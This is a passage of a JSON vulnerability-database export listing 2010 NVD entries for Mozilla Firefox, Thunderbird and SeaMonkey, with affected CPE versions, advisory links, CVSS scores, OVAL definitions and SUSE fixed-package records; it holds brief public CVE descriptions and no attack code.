"cpe:/a:mozilla:thunderbird:0.2", "cpe:/a:mozilla:thunderbird:1.5.0.5", "cpe:/a:mozilla:firefox:3.5.10", "cpe:/a:mozilla:firefox:3.6.6", "cpe:/a:mozilla:seamonkey:1.1.19", "cpe:/a:mozilla:thunderbird:2.0.0.16", "cpe:/a:mozilla:firefox:2.0.0.19", "cpe:/a:mozilla:firefox:3.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.11", "cpe:/a:mozilla:thunderbird:0.1", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:thunderbird:2.0.0.14", "cpe:/a:mozilla:firefox:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.7", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:thunderbird:0.9", "cpe:/a:mozilla:thunderbird:2.0.0.8", "cpe:/a:mozilla:thunderbird:1.0.3", "cpe:/a:mozilla:thunderbird:2.0.0.18", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:thunderbird:0.3", "cpe:/a:mozilla:thunderbird:2.0.0.6", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2010-3182", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3182", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:37:04", "references": ["http://www.redhat.com/support/errata/RHSA-2010-0781.html", "http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-68.html", "http://www.redhat.com/support/errata/RHSA-2010-0861.html", "http://support.avaya.com/css/P8/documents/100114250", "http://www.ubuntu.com/usn/USN-997-1", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:210", "http://www.debian.org/security/2010/dsa-2124", "https://bugzilla.mozilla.org/show_bug.cgi?id=556734", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html", "http://support.avaya.com/css/P8/documents/100120156", "http://www.vupen.com/english/advisories/2011/0061", "http://www.redhat.com/support/errata/RHSA-2010-0782.html"], "description": "Multiple cross-site scripting (XSS) vulnerabilities in the Gopher parser in Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, and SeaMonkey before 2.0.9, allow remote attackers to inject arbitrary web script or HTML via a crafted name of a (1) file or (2) directory on a Gopher server.", "edition": 2, "reporter": "NVD", "published": "2010-10-21T15:00:03", "title": "CVE-2010-3177", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:04", "vector": "NONE", "value": 4.3}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12202", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12202"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3177"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12202", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:12202"}], "modified": "2017-09-18T21:31:16", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.9", "cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:firefox:3.5.12", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:firefox:2.0.0.18", "cpe:/a:mozilla:firefox:2.0.0.8", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.1.18", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:seamonkey:1.1:beta", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:seamonkey:1.5.0.9", "cpe:/a:mozilla:firefox:2.0.0.3", "cpe:/a:mozilla:firefox:2.0.0.2", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:3.6.7", "cpe:/a:mozilla:firefox:3.6.2", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:3.5.13", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:firefox:3.6.4", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:firefox:2.0.0.17", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:firefox:1.0:preview_release", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:2.0.0.20", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:firefox:2.0.0.7", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:seamonkey:1.1:alpha", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:firefox:3.6.8", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:firefox:3.6.3", "cpe:/a:mozilla:firefox:3.6.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:firefox:3.0.16", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:seamonkey:1.0:alpha", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:firefox:2.0.0.6", "cpe:/a:mozilla:firefox:2.0.0.5", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:firefox:3.5.8", "cpe:/a:mozilla:seamonkey:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:firefox:3.5.11", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:firefox:3.5.9", "cpe:/a:mozilla:firefox:3.6.10", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:2.0.0.16", "cpe:/a:mozilla:firefox:3.5.10", "cpe:/a:mozilla:firefox:3.6.6", "cpe:/a:mozilla:seamonkey:1.1.19", "cpe:/a:mozilla:firefox:2.0.0.19", "cpe:/a:mozilla:firefox:3.0.17", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:firefox:2.0.0.4", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2010-3177", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3177", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-09-19T13:37:04", "references": ["http://www.mozilla.org/security/announce/2010/mfsa2010-67.html", "http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html", "http://www.redhat.com/support/errata/RHSA-2010-0861.html", "http://www.zerodayinitiative.com/advisories/ZDI-10-219/", "http://www.securityfocus.com/bid/44249", "http://www.ubuntu.com/usn/USN-997-1", "http://www.redhat.com/support/errata/RHSA-2010-0896.html", "http://www.ubuntu.com/usn/USN-998-1", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:210", "http://www.debian.org/security/2010/dsa-2124", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=598669", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:211", "http://support.avaya.com/css/P8/documents/100120156", "http://www.vupen.com/english/advisories/2011/0061", "http://www.redhat.com/support/errata/RHSA-2010-0782.html"], "description": "The LookupGetterOrSetter function in js3250.dll in Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, Thunderbird before 3.0.9 and 3.1.x before 3.1.5, and SeaMonkey before 2.0.9 does not properly support window.__lookupGetter__ function calls that lack arguments, which allows remote attackers to execute arbitrary code or cause a denial of service (incorrect pointer dereference and application crash) via vectors involving a \"dangling pointer\" and the JS_ValueToId function.", "edition": 2, "reporter": "NVD", "published": "2010-10-21T15:00:03", "title": "CVE-2010-3183", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:04", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11891", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11891"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3183"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11891", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:11891"}], "modified": "2017-09-18T21:31:17", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.9", "cpe:/a:mozilla:thunderbird:1.5.0.10", "cpe:/a:mozilla:thunderbird:3.0.6", "cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:thunderbird:3.0.2", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.3", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:thunderbird:2.0.0.9", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:firefox:3.5.12", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:firefox:2.0.0.18", "cpe:/a:mozilla:firefox:2.0.0.8", "cpe:/a:mozilla:thunderbird:0.7", "cpe:/a:mozilla:thunderbird:3.0", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:thunderbird:1.5:beta2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.1.18", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:thunderbird:2.0.0.21", "cpe:/a:mozilla:seamonkey:1.1:beta", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:seamonkey:1.5.0.9", "cpe:/a:mozilla:firefox:2.0.0.3", "cpe:/a:mozilla:thunderbird:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.2", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:3.6.7", "cpe:/a:mozilla:firefox:3.6.2", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:3.5.13", "cpe:/a:mozilla:thunderbird:3.0.7", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:firefox:3.6.4", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:thunderbird:1.0.4", "cpe:/a:mozilla:thunderbird:2.0.0.22", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:thunderbird:2.0.0.12", "cpe:/a:mozilla:thunderbird:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:thunderbird:1.5.0.4", "cpe:/a:mozilla:firefox:1.0:preview_release", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:2.0.0.20", "cpe:/a:mozilla:thunderbird:3.1", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:thunderbird:1.5.0.6", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:thunderbird:1.0", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:thunderbird:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:thunderbird:1.5.2", "cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:thunderbird:3.1.3", "cpe:/a:mozilla:thunderbird:1.5.0.1", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:thunderbird:3.0.3", "cpe:/a:mozilla:thunderbird:0.4", "cpe:/a:mozilla:firefox:2.0.0.7", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:thunderbird:2.0.0.23", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:seamonkey:1.1:alpha", "cpe:/a:mozilla:thunderbird:0.7.2", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:firefox:3.6.8", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:thunderbird:2.0.0.19", "cpe:/a:mozilla:thunderbird:3.0.8", "cpe:/a:mozilla:thunderbird:0.6", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:firefox:3.6.3", "cpe:/a:mozilla:thunderbird:2.0.0.7", "cpe:/a:mozilla:thunderbird:3.1.1", "cpe:/a:mozilla:firefox:3.6.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:thunderbird:3.1.2", "cpe:/a:mozilla:thunderbird:2.0.0.2", "cpe:/a:mozilla:thunderbird:1.5.0.13", "cpe:/a:mozilla:thunderbird:0.8", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:thunderbird:2.0.0.5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:firefox:3.0.16", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:0.7.1", "cpe:/a:mozilla:seamonkey:1.0:alpha", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.12", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.3", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:thunderbird:3.0.4", "cpe:/a:mozilla:thunderbird:0.7.3", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:thunderbird:1.0.5", "cpe:/a:mozilla:thunderbird:1.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:thunderbird:2.0", "cpe:/a:mozilla:firefox:2.0.0.6", "cpe:/a:mozilla:thunderbird:2.0.0.1", "cpe:/a:mozilla:firefox:2.0.0.5", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:thunderbird:1.5.0.14", "cpe:/a:mozilla:thunderbird:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:firefox:3.5.8", "cpe:/a:mozilla:seamonkey:1.5.0.8", "cpe:/a:mozilla:thunderbird:2.0.0.0", "cpe:/a:mozilla:thunderbird:3.0.5", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:thunderbird:3.1.4", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:firefox:3.5.11", "cpe:/a:mozilla:thunderbird:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.0.2", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:thunderbird:0.5", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:thunderbird:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:thunderbird:1.5.1", "cpe:/a:mozilla:firefox:3.5.9", "cpe:/a:mozilla:firefox:3.6.10", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:thunderbird:1.0.7", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:2.0.0.16", "cpe:/a:mozilla:thunderbird:0.2", "cpe:/a:mozilla:thunderbird:1.5.0.5", "cpe:/a:mozilla:firefox:3.5.10", "cpe:/a:mozilla:firefox:3.6.6", "cpe:/a:mozilla:seamonkey:1.1.19", "cpe:/a:mozilla:thunderbird:2.0.0.16", "cpe:/a:mozilla:firefox:2.0.0.19", "cpe:/a:mozilla:firefox:3.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.11", "cpe:/a:mozilla:thunderbird:0.1", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:thunderbird:2.0.0.14", "cpe:/a:mozilla:firefox:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.7", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:thunderbird:0.9", "cpe:/a:mozilla:thunderbird:2.0.0.8", "cpe:/a:mozilla:thunderbird:1.0.3", "cpe:/a:mozilla:thunderbird:2.0.0.18", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:thunderbird:0.3", "cpe:/a:mozilla:thunderbird:2.0.0.6", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2010-3183", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3183", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:57:58", "references": [], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.6.12-0.7.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-common-3.6.12-0.7.1.i586.rpm", "packageName": "MozillaFirefox-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.ia64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "ppc", "packageFilename": "mozilla-nss-tools-3.12.8-1.4.1.ppc.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-32bit-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "i586", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.i586.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.i586.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "libfreebl3-32bit-3.12.8-1.2.1.x86_64.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "x86_64", "packageFilename": "seamonkey-translations-common-2.0.10-0.7.1.x86_64.rpm", "packageName": "seamonkey-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.0.1-4.3.1", "arch": "x86_64", "packageFilename": "enigmail-1.0.1-4.3.1.x86_64.rpm", "packageName": "enigmail", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.0.10-0.3.1", "arch": "i586", "packageFilename": "MozillaThunderbird-translations-common-3.0.10-0.3.1.i586.rpm", "packageName": "MozillaThunderbird-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-common-3.6.12-0.1.1.i586.rpm", "packageName": "MozillaFirefox-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-common-32bit-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-common-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-32bit-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.0.1-3.3.1", "arch": "x86_64", "packageFilename": "enigmail-1.0.1-3.3.1.x86_64.rpm", "packageName": "enigmail", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-translations-other-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner191-translations-other-1.9.1.15-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner191-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "4.8.6-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-4.8.6-1.1.1.x86_64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.0.1-6.5.1", "arch": "i586", "packageFilename": "enigmail-1.0.1-6.5.1.i586.rpm", "packageName": "enigmail", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nss-32bit-3.12.8-1.2.1.ppc64.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": 